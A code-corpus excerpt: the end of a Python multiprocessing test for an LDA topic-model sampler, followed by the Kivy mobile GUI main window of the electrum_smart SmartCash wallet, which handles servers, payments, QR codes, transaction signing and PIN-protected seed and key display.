p.start()
p.join()
def test_LdaCgsMulti_eq_LdaCgsSeq(self):
t = MPTester()
p = Process(target=t.test_LdaCgsMulti_eq_LdaCgsSeq, args=())
p.start()
p.join()
def test_LdaCgsMulti_eq_LdaCgsSeq_multi(self):
t = MPTester()
p = Process(target=t.test_LdaCgsMulti_eq_LdaCgsSeq_multi, args=())
p.start()
p.join()
if __name__ == '__main__':
suite = unittest.TestLoader().loadTestsFromTestCase(TestLdaCgsMulti)
unittest.TextTestRunner(verbosity=2).run(suite)
|
main_window.py
|
import re
import os
import sys
import time
import datetime
import traceback
from decimal import Decimal
import threading
import electrum_smart as electrum
from electrum_smart.bitcoin import TYPE_ADDRESS
from electrum_smart import WalletStorage, Wallet
from electrum_smart_gui.kivy.i18n import _
from electrum_smart.paymentrequest import InvoiceStore
from electrum_smart.util import profiler, InvalidPassword
from electrum_smart.plugins import run_hook
from electrum_smart.util import format_satoshis, format_satoshis_plain
from electrum_smart.paymentrequest import PR_UNPAID, PR_PAID, PR_UNKNOWN, PR_EXPIRED
from kivy.app import App
from kivy.core.window import Window
from kivy.logger import Logger
from kivy.utils import platform
from kivy.properties import (OptionProperty, AliasProperty, ObjectProperty,
StringProperty, ListProperty, BooleanProperty, NumericProperty)
from kivy.cache import Cache
from kivy.clock import Clock
from kivy.factory import Factory
from kivy.metrics import inch
from kivy.lang import Builder
## lazy imports for factory so that widgets can be used in kv
#Factory.register('InstallWizard', module='electrum_smart_gui.kivy.uix.dialogs.installwizard')
#Factory.register('InfoBubble', module='electrum_smart_gui.kivy.uix.dialogs')
#Factory.register('OutputList', module='electrum_smart_gui.kivy.uix.dialogs')
#Factory.register('OutputItem', module='electrum_smart_gui.kivy.uix.dialogs')
from .uix.dialogs.installwizard import InstallWizard
from .uix.dialogs import InfoBubble
from .uix.dialogs import OutputList, OutputItem
#from kivy.core.window import Window
#Window.softinput_mode = 'below_target'
# delayed imports: for startup speed on android
notification = app = ref = None
util = False
# register widget cache for keeping memory down timeout to forever to cache
# the data
Cache.register('electrum_widgets', timeout=0)
from kivy.uix.screenmanager import Screen
from kivy.uix.tabbedpanel import TabbedPanel
from kivy.uix.label import Label
from kivy.core.clipboard import Clipboard
Factory.register('TabbedCarousel', module='electrum_smart_gui.kivy.uix.screens')
# Register fonts without this you won't be able to use bold/italic...
# inside markup.
from kivy.core.text import Label
Label.register('Roboto',
'gui/kivy/data/fonts/Roboto.ttf',
'gui/kivy/data/fonts/Roboto.ttf',
'gui/kivy/data/fonts/Roboto-Bold.ttf',
'gui/kivy/data/fonts/Roboto-Bold.ttf')
from electrum_smart.util import base_units
class ElectrumWindow(App):
electrum_config = ObjectProperty(None)
language = StringProperty('en')
# properties might be updated by the network
num_blocks = NumericProperty(0)
num_nodes = NumericProperty(0)
server_host = StringProperty('')
server_port = StringProperty('')
num_chains = NumericProperty(0)
blockchain_name = StringProperty('')
fee_status = StringProperty('Fee')
balance = StringProperty('')
fiat_balance = StringProperty('')
is_fiat = BooleanProperty(False)
blockchain_checkpoint = NumericProperty(0)
auto_connect = BooleanProperty(False)
def on_auto_connect(self, instance, x):
host, port, protocol, proxy, auto_connect = self.network.get_parameters()
self.network.set_parameters(host, port, protocol, proxy, self.auto_connect)
def toggle_auto_connect(self, x):
self.auto_connect = not self.auto_connect
def choose_server_dialog(self, popup):
from .uix.dialogs.choice_dialog import ChoiceDialog
protocol = 's'
def cb2(host):
from electrum_smart import constants
pp = servers.get(host, constants.net.DEFAULT_PORTS)
port = pp.get(protocol, '')
popup.ids.host.text = host
popup.ids.port.text = port
servers = self.network.get_servers()
ChoiceDialog(_('Choose a server'), sorted(servers), popup.ids.host.text, cb2).open()
def choose_blockchain_dialog(self, dt):
from .uix.dialogs.choice_dialog import ChoiceDialog
chains = self.network.get_blockchains()
def cb(name):
for index, b in self.network.blockchains.items():
if name == self.network.get_blockchain_name(b):
self.network.follow_chain(index)
#self.block
names = [self.network.blockchains[b].get_name() for b in chains]
if len(names) >1:
ChoiceDialog(_('Choose your chain'), names, '', cb).open()
use_rbf = BooleanProperty(False)
def on_use_rbf(self, instance, x):
self.electrum_config.set_key('use_rbf', self.use_rbf, False)
use_change = BooleanProperty(False)
def on_use_change(self, instance, x):
self.electrum_config.set_key('use_change', self.use_change, True)
use_unconfirmed = BooleanProperty(False)
def on_use_unconfirmed(self, instance, x):
self.electrum_config.set_key('confirmed_only', not self.use_unconfirmed, True)
def set_URI(self, uri):
self.switch_to('send')
self.send_screen.set_URI(uri)
def on_new_intent(self, intent):
if intent.getScheme() != 'bitcoin':
return
uri = intent.getDataString()
self.set_URI(uri)
def on_language(self, instance, language):
Logger.info('language: {}'.format(language))
_.switch_lang(language)
def update_history(self, *dt):
if self.history_screen:
self.history_screen.update()
def on_quotes(self, d):
Logger.info("on_quotes")
self._trigger_update_history()
def on_history(self, d):
Logger.info("on_history")
self._trigger_update_history()
def _get_bu(self):
return self.electrum_config.get('base_unit', 'mSMART')
def _set_bu(self, value):
assert value in base_units.keys()
self.electrum_config.set_key('base_unit', value, True)
self._trigger_update_status()
self._trigger_update_history()
base_unit = AliasProperty(_get_bu, _set_bu)
status = StringProperty('')
fiat_unit = StringProperty('')
def on_fiat_unit(self, a, b):
self._trigger_update_history()
def decimal_point(self):
return base_units[self.base_unit]
def btc_to_fiat(self, amount_str):
if not amount_str:
return ''
if not self.fx.is_enabled():
return ''
rate = self.fx.exchange_rate()
if rate.is_nan():
return ''
fiat_amount = self.get_amount(amount_str + ' ' + self.base_unit) * rate / pow(10, 8)
return "{:.2f}".format(fiat_amount).rstrip('0').rstrip('.')
def fiat_to_btc(self, fiat_amount):
if not fiat_amount:
return ''
rate = self.fx.exchange_rate()
if rate.is_nan():
return ''
satoshis = int(pow(10,8) * Decimal(fiat_amount) / Decimal(rate))
return format_satoshis_plain(satoshis, self.decimal_point())
def get_amount(self, amount_str):
a, u = amount_str.split()
assert u == self.base_unit
try:
x = Decimal(a)
except:
return None
p = pow(10, self.decimal_point())
return int(p * x)
_orientation = OptionProperty('landscape',
options=('landscape', 'portrait'))
def _get_orientation(self):
return self._orientation
orientation = AliasProperty(_get_orientation,
None,
bind=('_orientation',))
'''Tries to ascertain the kind of device the app is running on.
Cane be one of `tablet` or `phone`.
:data:`orientation` is a read only `AliasProperty` Defaults to 'landscape'
'''
_ui_mode = OptionProperty('phone', options=('tablet', 'phone'))
def _get_ui_mode(self):
return self._ui_mode
ui_mode = AliasProperty(_get_ui_mode,
None,
bind=('_ui_mode',))
'''Defines tries to ascertain the kind of device the app is running on.
Cane be one of `tablet` or `phone`.
:data:`ui_mode` is a read only `AliasProperty` Defaults to 'phone'
'''
def __init__(self, **kwargs):
# initialize variables
self._clipboard = Clipboard
self.info_bubble = None
self.nfcscanner = None
self.tabs = None
self.is_exit = False
self.wallet = None
self.pause_time = 0
App.__init__(self)#, **kwargs)
title = _('Electrum App')
self.electrum_config = config = kwargs.get('config', None)
self.language = config.get('language', 'en')
self.network = network = kwargs.get('network', None)
if self.network:
self.num_blocks = self.network.get_local_height()
self.num_nodes = len(self.network.get_interfaces())
host, port, protocol, proxy_config, auto_connect = self.network.get_parameters()
self.server_host = host
self.server_port = port
self.auto_connect = auto_connect
self.proxy_config = proxy_config if proxy_config else {}
self.plugins = kwargs.get('plugins', [])
self.gui_object = kwargs.get('gui_object', None)
self.daemon = self.gui_object.daemon
self.fx = self.daemon.fx
self.use_rbf = config.get('use_rbf', False)
self.use_change = config.get('use_change', True)
self.use_unconfirmed = not config.get('confirmed_only', False)
# create triggers so as to minimize updation a max of 2 times a sec
self._trigger_update_wallet = Clock.create_trigger(self.update_wallet, .5)
self._trigger_update_status = Clock.create_trigger(self.update_status, .5)
self._trigger_update_history = Clock.create_trigger(self.update_history, .5)
self._trigger_update_interfaces = Clock.create_trigger(self.update_interfaces, .5)
# cached dialogs
self._settings_dialog = None
self._password_dialog = None
self.fee_status = self.electrum_config.get_fee_status()
def wallet_name(self):
return os.path.basename(self.wallet.storage.path) if self.wallet else ' '
def on_pr(self, pr):
if pr.verify(self.wallet.contacts):
key = self.wallet.invoices.add(pr)
if self.invoices_screen:
self.invoices_screen.update()
status = self.wallet.invoices.get_status(key)
if status == PR_PAID:
self.show_error("invoice already paid")
self.send_screen.do_clear()
else:
if pr.has_expired():
self.show_error(_('Payment request has expired'))
else:
self.switch_to('send')
self.send_screen.set_request(pr)
else:
self.show_error("invoice error:" + pr.error)
self.send_screen.do_clear()
def on_qr(self, data):
from electrum_smart.bitcoin import base_decode, is_address
data = data.strip()
if is_address(data):
self.set_URI(data)
return
if data.startswith('smartcash:'):
self.set_URI(data)
return
# try to decode transaction
from electrum_smart.transaction import Transaction
from electrum_smart.util import bh2u
try:
text = bh2u(base_decode(data, None, base=43))
tx = Transaction(text)
tx.deserialize()
except:
tx = None
if tx:
self.tx_dialog(tx)
return
# show error
self.show_error("Unable to decode QR data")
def update_tab(self, name):
s = getattr(self, name + '_screen', None)
if s:
s.update()
@profiler
def update_tabs(self):
for tab in ['invoices', 'send', 'history', 'receive', 'address']:
self.update_tab(tab)
def switch_to(self, name):
s = getattr(self, name + '_screen', None)
if s is None:
s = self.tabs.ids[name + '_screen']
s.load_screen()
panel = self.tabs.ids.panel
tab = self.tabs.ids[name + '_tab']
panel.switch_to(tab)
def show_request(self, addr):
self.switch_to('receive')
self.receive_screen.screen.address = addr
def show_pr_details(self, req, status, is_invoice):
from electrum_smart.util import format_time
requestor = req.get('requestor')
exp = req.get('exp')
memo = req.get('memo')
amount = req.get('amount')
fund = req.get('fund')
popup = Builder.load_file('gui/kivy/uix/ui_screens/invoice.kv')
popup.is_invoice = is_invoice
popup.amount = amount
popup.requestor = requestor if is_invoice else req.get('address')
popup.exp = format_time(exp) if exp else ''
popup.description = memo if memo else ''
popup.signature = req.get('signature', '')
popup.status = status
popup.fund = fund if fund else 0
txid = req.get('txid')
popup.tx_hash = txid or ''
popup.on_open = lambda: popup.ids.output_list.update(req.get('outputs', []))
popup.export = self.export_private_keys
popup.open()
def show_addr_details(self, req, status):
from electrum_smart.util import format_time
fund = req.get('fund')
isaddr = 'y'
popup = Builder.load_file('gui/kivy/uix/ui_screens/invoice.kv')
popup.isaddr = isaddr
popup.is_invoice = False
popup.status = status
popup.requestor = req.get('address')
popup.fund = fund if fund else 0
popup.export = self.export_private_keys
popup.open()
def qr_dialog(self, title, data, show_text=False):
from .uix.dialogs.qr_dialog import QRDialog
popup = QRDialog(title, data, show_text)
popup.open()
def scan_qr(self, on_complete):
if platform != 'android':
return
from jnius import autoclass, cast
from android import activity
PythonActivity = autoclass('org.kivy.android.PythonActivity')
SimpleScannerActivity = autoclass("org.electrum.qr.SimpleScannerActivity")
Intent = autoclass('android.content.Intent')
intent = Intent(PythonActivity.mActivity, SimpleScannerActivity)
def on_qr_result(requestCode, resultCode, intent):
if resultCode == -1: # RESULT_OK:
# this doesn't work due to some bug in jnius:
# contents = intent.getStringExtra("text")
String = autoclass("java.lang.String")
contents = intent.getStringExtra(String("text"))
on_complete(contents)
activity.bind(on_activity_result=on_qr_result)
PythonActivity.mActivity.startActivityForResult(intent, 0)
def do_share(self, data, title):
if platform != 'android':
return
from jnius import autoclass, cast
JS = autoclass('java.lang.String')
Intent = autoclass('android.content.Intent')
sendIntent = Intent()
sendIntent.setAction(Intent.ACTION_SEND)
sendIntent.setType("text/plain")
sendIntent.putExtra(Intent.EXTRA_TEXT, JS(data))
PythonActivity = autoclass('org.kivy.android.PythonActivity')
currentActivity = cast('android.app.Activity', PythonActivity.mActivity)
it = Intent.createChooser(sendIntent, cast('java.lang.CharSequence', JS(title)))
currentActivity.startActivity(it)
def build(self):
return Builder.load_file('gui/kivy/main.kv')
def _pause(self):
if platform == 'android':
# move activity to back
from jnius import autoclass
python_act = autoclass('org.kivy.android.PythonActivity')
mActivity = python_act.mActivity
mActivity.moveTaskToBack(True)
def on_start(self):
''' This is the start point of the kivy ui
'''
import time
Logger.info('Time to on_start: {} <<<<<<<<'.format(time.clock()))
win = Window
win.bind(size=self.on_size, on_keyboard=self.on_keyboard)
win.bind(on_key_down=self.on_key_down)
#win.softinput_mode = 'below_target'
self.on_size(win, win.size)
self.init_ui()
# init plugins
run_hook('init_kivy', self)
# fiat currency
self.fiat_unit = self.fx.ccy if self.fx.is_enabled() else ''
# default tab
self.switch_to('history')
# bind intent for bitcoin: URI scheme
if platform == 'android':
from android import activity
from jnius import autoclass
PythonActivity = autoclass('org.kivy.android.PythonActivity')
mactivity = PythonActivity.mActivity
self.on_new_intent(mactivity.getIntent())
activity.bind(on_new_intent=self.on_new_intent)
# connect callbacks
if self.network:
interests = ['updated', 'status', 'new_transaction', 'verified', 'interfaces']
self.network.register_callback(self.on_network_event, interests)
self.network.register_callback(self.on_fee, ['fee'])
self.network.register_callback(self.on_quotes, ['on_quotes'])
self.network.register_callback(self.on_history, ['on_history'])
# load wallet
self.load_wallet_by_name(self.electrum_config.get_wallet_path())
# URI passed in config
uri = self.electrum_config.get('url')
if uri:
self.set_URI(uri)
def get_wallet_path(self):
if self.wallet:
return self.wallet.storage.path
else:
return ''
def on_wizard_complete(self, instance, wallet):
if wallet:
wallet.start_threads(self.daemon.network)
self.daemon.add_wallet(wallet)
self.load_wallet(wallet)
def load_wallet_by_name(self, path):
if not path:
return
if self.wallet and self.wallet.storage.path == path:
return
wallet = self.daemon.load_wallet(path, None)
if wallet:
if wallet.has_password():
self.password_dialog(wallet, _('Enter PIN code'), lambda x: self.load_wallet(wallet), self.stop)
else:
self.load_wallet(wallet)
else:
Logger.debug('Electrum: Wallet not found. Launching install wizard')
storage = WalletStorage(path)
wizard = Factory.InstallWizard(self.electrum_config, storage)
wizard.bind(on_wizard_complete=self.on_wizard_complete)
action = wizard.storage.get_action()
wizard.run(action)
def on_stop(self):
Logger.info('on_stop')
self.stop_wallet()
def stop_wallet(self):
if self.wallet:
self.daemon.stop_wallet(self.wallet.storage.path)
self.wallet = None
def on_key_down(self, instance, key, keycode, codepoint, modifiers):
if 'ctrl' in modifiers:
# q=24 w=25
if keycode in (24, 25):
self.stop()
elif keycode == 27:
# r=27
# force update wallet
self.update_wallet()
elif keycode == 112:
# pageup
#TODO move to next tab
pass
elif keycode == 117:
# pagedown
#TODO move to prev tab
pass
#TODO: alt+tab_number to activate the particular tab
def on_keyboard(self, instance, key, keycode, codepoint, modifiers):
if key == 27 and self.is_exit is False:
self.is_exit = True
self.show_info(_('Press again to exit'))
return True
# override settings button
if key in (319, 282): #f1/settings button on android
#self.gui.main_gui.toggle_settings(self)
return True
def settings_dialog(self):
from .uix.dialogs.settings import SettingsDialog
if self._settings_dialog is None:
self._settings_dialog = SettingsDialog(self)
self._settings_dialog.update()
self._settings_dialog.open()
def popup_dialog(self, name):
if name == 'settings':
self.settings_dialog()
elif name == 'wallets':
from .uix.dialogs.wallets import WalletDialog
d = WalletDialog()
d.open()
else:
popup = Builder.load_file('gui/kivy/uix/ui_screens/'+name+'.kv')
popup.open()
@profiler
def init_ui(self):
''' Initialize The Ux part of electrum. This function performs the basic
tasks of setting up the ui.
'''
#from weakref import ref
self.funds_error = False
# setup UX
self.screens = {}
#setup lazy imports for mainscreen
Factory.register('AnimatedPopup',
module='electrum_smart_gui.kivy.uix.dialogs')
Factory.register('QRCodeWidget',
module='electrum_smart_gui.kivy.uix.qrcodewidget')
# preload widgets. Remove this if you want to load the widgets on demand
#Cache.append('electrum_widgets', 'AnimatedPopup', Factory.AnimatedPopup())
#Cache.append('electrum_widgets', 'QRCodeWidget', Factory.QRCodeWidget())
# load and focus the ui
self.root.manager = self.root.ids['manager']
self.history_screen = None
self.contacts_screen = None
self.send_screen = None
self.invoices_screen = None
self.receive_screen = None
self.requests_screen = None
self.address_screen = None
self.icon = "icons/electrum-smart.png"
self.tabs = self.root.ids['tabs']
def update_interfaces(self, dt):
self.num_nodes = len(self.network.get_interfaces())
self.num_chains = len(self.network.get_blockchains())
chain = self.network.blockchain()
self.blockchain_checkpoint = chain.get_checkpoint()
self.blockchain_name = chain.get_name()
if self.network.interface:
self.server_host = self.network.interface.host
def on_network_event(self, event, *args):
Logger.info('network event: '+ event)
if event == 'interfaces':
self._trigger_update_interfaces()
elif event == 'updated':
self._trigger_update_wallet()
self._trigger_update_status()
elif event == 'status':
self._trigger_update_status()
elif event == 'new_transaction':
self._trigger_update_wallet()
elif event == 'verified':
self._trigger_update_wallet()
@profiler
def load_wallet(self, wallet):
if self.wallet:
self.stop_wallet()
self.wallet = wallet
self.update_wallet()
# Once GUI has been initialized check if we want to announce something
# since the callback has been called before the GUI was initialized
if self.receive_screen:
self.receive_screen.clear()
self.update_tabs()
run_hook('load_wallet', wallet, self)
def update_status(self, *dt):
self.num_blocks = self.network.get_local_height()
if not self.wallet:
self.status = _("No Wallet")
return
if self.network is None or not self.network.is_running():
status = _("Offline")
elif self.network.is_connected():
server_height = self.network.get_server_height()
server_lag = self.network.get_local_height() - server_height
if not self.wallet.up_to_date or server_height == 0:
status = _("Synchronizing...")
elif server_lag > 1:
status = _("Server lagging")
else:
status = ''
else:
status = _("Disconnected")
self.status = self.wallet.basename() + (' [size=15dp](%s)[/size]'%status if status else '')
# balance
c, u, x = self.wallet.get_balance()
text = self.format_amount(c+x+u)
self.balance = str(text.strip()) + ' [size=22dp]%s[/size]'% self.base_unit
self.fiat_balance = self.fx.format_amount(c+u+x) + ' [size=22dp]%s[/size]'% self.fx.ccy
def get_max_amount(self):
inputs = self.wallet.get_spendable_coins(None, self.electrum_config)
addr = str(self.send_screen.screen.address) or self.wallet.dummy_address()
outputs = [(TYPE_ADDRESS, addr, '!')]
tx = self.wallet.make_unsigned_transaction(inputs, outputs, self.electrum_config)
amount = tx.output_value()
return format_satoshis_plain(amount, self.decimal_point())
def format_amount(self, x, is_diff=False, whitespaces=False):
return format_satoshis(x, is_diff, 0, self.decimal_point(), whitespaces)
def format_amount_and_units(self, x):
return format_satoshis_plain(x, self.decimal_point()) + ' ' + self.base_unit
#@profiler
def update_wallet(self, *dt):
self._trigger_update_status()
if self.wallet and (self.wallet.up_to_date or not self.network or not self.network.is_connected()):
self.update_tabs()
def notify(self, message):
try:
global notification, os
if not notification:
from plyer import notification
icon = (os.path.dirname(os.path.realpath(__file__))
+ '/../../' + self.icon)
notification.notify('Electrum', message,
app_icon=icon, app_name='Electrum')
except ImportError:
Logger.Error('Notification: needs plyer; `sudo pip install plyer`')
def on_pause(self):
self.pause_time = time.time()
# pause nfc
if self.nfcscanner:
self.nfcscanner.nfc_disable()
return True
def on_resume(self):
now = time.time()
if self.wallet.has_password and now - self.pause_time > 60:
self.password_dialog(self.wallet, _('Enter PIN'), None, self.stop)
if self.nfcscanner:
self.nfcscanner.nfc_enable()
def on_size(self, instance, value):
width, height = value
self._orientation = 'landscape' if width > height else 'portrait'
self._ui_mode = 'tablet' if min(width, height) > inch(3.51) else 'phone'
def on_ref_label(self, label, touch):
if label.touched:
label.touched = False
self.qr_dialog(label.name, label.data, True)
else:
label.touched = True
self._clipboard.copy(label.data)
Clock.schedule_once(lambda dt: self.show_info(_('Text copied to clipboard.\nTap again to display it as QR code.')))
def set_send(self, address, amount, label, message):
self.send_payment(address, amount=amount, label=label, message=message)
def show_error(self, error, width='200dp', pos=None, arrow_pos=None,
exit=False, icon='atlas://gui/kivy/theming/light/error', duration=0,
modal=False):
''' Show a error Message Bubble.
'''
self.show_info_bubble( text=error, icon=icon, width=width,
pos=pos or Window.center, arrow_pos=arrow_pos, exit=exit,
duration=duration, modal=modal)
def show_info(self, error, width='200dp', pos=None, arrow_pos=None,
exit=False, duration=0, modal=False):
''' Show a Info Message Bubble.
'''
self.show_error(error, icon='atlas://gui/kivy/theming/light/important',
duration=duration, modal=modal, exit=exit, pos=pos,
arrow_pos=arrow_pos)
def show_info_bubble(self, text=_('Hello World'), pos=None, duration=0,
arrow_pos='bottom_mid', width=None, icon='', modal=False, exit=False):
'''Method to show a Information Bubble
.. parameters::
text: Message to be displayed
pos: position for the bubble
duration: duration the bubble remains on screen. 0 = click to hide
width: width of the Bubble
arrow_pos: arrow position for the bubble
'''
info_bubble = self.info_bubble
if not info_bubble:
info_bubble = self.info_bubble = Factory.InfoBubble()
win = Window
if info_bubble.parent:
win.remove_widget(info_bubble
if not info_bubble.modal else
info_bubble._modal_view)
if not arrow_pos:
info_bubble.show_arrow = False
else:
info_bubble.show_arrow = True
info_bubble.arrow_pos = arrow_pos
img = info_bubble.ids.img
if text == 'texture':
# icon holds a texture not a source image
# display the texture in full screen
text = ''
img.texture = icon
info_bubble.fs = True
info_bubble.show_arrow = False
img.allow_stretch = True
info_bubble.dim_background = True
info_bubble.background_image = 'atlas://gui/kivy/theming/light/card'
else:
info_bubble.fs = False
info_bubble.icon = icon
#if img.texture and img._coreimage:
# img.reload()
img.allow_stretch = False
info_bubble.dim_background = False
info_bubble.background_image = 'atlas://data/images/defaulttheme/bubble'
info_bubble.message = text
if not pos:
pos = (win.center[0], win.center[1] - (info_bubble.height/2))
info_bubble.show(pos, duration, width, modal=modal, exit=exit)
def tx_dialog(self, tx):
from .uix.dialogs.tx_dialog import TxDialog
d = TxDialog(self, tx)
d.open()
def sign_tx(self, *args):
threading.Thread(target=self._sign_tx, args=args).start()
def _sign_tx(self, tx, password, on_success, on_failure):
try:
self.wallet.sign_transaction(tx, password)
except InvalidPassword:
Clock.schedule_once(lambda dt: on_failure(_("Invalid PIN")))
return
Clock.schedule_once(lambda dt: on_success(tx))
def _broadcast_thread(self, tx, on_complete):
ok, txid = self.network.broadcast(tx)
Clock.schedule_once(lambda dt: on_complete(ok, txid))
def broadcast(self, tx, pr=None):
def on_complete(ok, msg):
if ok:
self.show_info(_('Payment sent.'))
if self.send_screen:
self.send_screen.do_clear()
if pr:
self.wallet.invoices.set_paid(pr, tx.txid())
self.wallet.invoices.save()
self.update_tab('invoices')
else:
self.show_error(msg)
if self.network and self.network.is_connected():
self.show_info(_('Sending'))
threading.Thread(target=self._broadcast_thread, args=(tx, on_complete)).start()
else:
self.show_info(_('Cannot broadcast transaction') + ':\n' + _('Not connected'))
def description_dialog(self, screen):
from .uix.dialogs.label_dialog import LabelDialog
text = screen.message
def callback(text):
screen.message = text
d = LabelDialog(_('Enter description'), text, callback)
d.open()
def amount_dialog(self, screen, show_max):
from .uix.dialogs.amount_dialog import AmountDialog
amount = screen.amount
if amount:
amount, u = str(amount).split()
assert u == self.base_unit
def cb(amount):
screen.amount = amount
popup = AmountDialog(show_max, amount, cb)
popup.open()
def invoices_dialog(self, screen):
from .uix.dialogs.invoices import InvoicesDialog
if len(self.wallet.invoices.sorted_list()) == 0:
self.show_info(' '.join([
_('No saved invoices.'),
_('Signed invoices are saved automatically when you scan them.'),
_('You may also save unsigned requests or contact addresses using the save button.')
]))
return
popup = InvoicesDialog(self, screen, None)
popup.update()
popup.open()
def requests_dialog(self, screen):
from .uix.dialogs.requests import RequestsDialog
if len(self.wallet.get_sorted_requests(self.electrum_config)) == 0:
self.show_info(_('No saved requests.'))
return
popup = RequestsDialog(self, screen, None)
popup.update()
popup.open()
def addresses_dialog(self, screen):
from .uix.dialogs.addresses import AddressesDialog
popup = AddressesDialog(self, screen, None)
popup.update()
popup.open()
def fee_dialog(self, label, dt):
from .uix.dialogs.fee_dialog import FeeDialog
def cb():
self.fee_status = self.electrum_config.get_fee_status()
fee_dialog = FeeDialog(self, self.electrum_config, cb)
fee_dialog.open()
def on_fee(self, event, *arg):
self.fee_status = self.electrum_config.get_fee_status()
def protected(self, msg, f, args):
if self.wallet.has_password():
on_success = lambda pw: f(*(args + (pw,)))
self.password_dialog(self.wallet, msg, on_success, lambda: None)
else:
f(*(args + (None,)))
def delete_wallet(self):
from .uix.dialogs.question import Question
basename = os.path.basename(self.wallet.storage.path)
d = Question(_('Delete wallet?') + '\n' + basename, self._delete_wallet)
d.open()
def _delete_wallet(self, b):
if b:
basename = self.wallet.basename()
self.protected(_("Enter your PIN code to confirm deletion of {}").format(basename), self.__delete_wallet, ())
def __delete_wallet(self, pw):
wallet_path = self.get_wallet_path()
dirname = os.path.dirname(wallet_path)
basename = os.path.basename(wallet_path)
if self.wallet.has_password():
try:
self.wallet.check_password(pw)
except:
self.show_error("Invalid PIN")
return
self.stop_wallet()
os.unlink(wallet_path)
self.show_error("Wallet removed:" + basename)
d = os.listdir(dirname)
name = 'default_wallet'
new_path = os.path.join(dirname, name)
self.load_wallet_by_name(new_path)
def show_seed(self, label):
self.protected(_("Enter your PIN code in order to decrypt your seed"), self._show_seed, (label,))
def _show_seed(self, label, password):
if self.wallet.has_password() and password is None:
return
keystore = self.wallet.keystore
try:
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
except:
self.show_error("Invalid PIN")
return
label.text = _('Seed') + ':\n' + seed
if passphrase:
label.text += '\n\n' + _('Passphrase') + ': ' + passphrase
def password_dialog(self, wallet, msg, on_success, on_failure):
from .uix.dialogs.password_dialog import PasswordDialog
if self._password_dialog is None:
self._password_dialog = PasswordDialog()
self._password_dialog.init(self, wallet, msg, on_success, on_failure)
self._password_dialog.open()
def change_password(self, cb):
from .uix.dialogs.password_dialog import PasswordDialog
if self._password_dialog is None:
self._password_dialog = PasswordDialog()
message = _("Changing PIN code.") + '\n' + _("Enter your current PIN:")
def on_success(old_password, new_password):
self.wallet.update_password(old_password, new_password)
self.show_info(_("Your PIN code was updated"))
on_failure = lambda: self.show_error(_("PIN codes do not match"))
self._password_dialog.init(self, self.wallet, message, on_success, on_failure, is_change=1)
self._password_dialog.open()
def export_private_keys(self, pk_label, addr):
if self.wallet.is_watching_only():
self.show_info(_('This is a watching-only wallet. It does not contain private keys.'))
return
def show_private_key(addr, pk_label, password):
if self.wallet.has_password() and password is None:
return
if not self.wallet.can_export():
return
try:
key = str(self.wallet.export_private_key(addr, password)[0])
pk_label.data = key
except InvalidPassword:
self.show_error("Invalid PIN")
return
self.protected(_("Enter your PIN code in order to decrypt your private key"), show_private_key, (addr, pk_label))
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.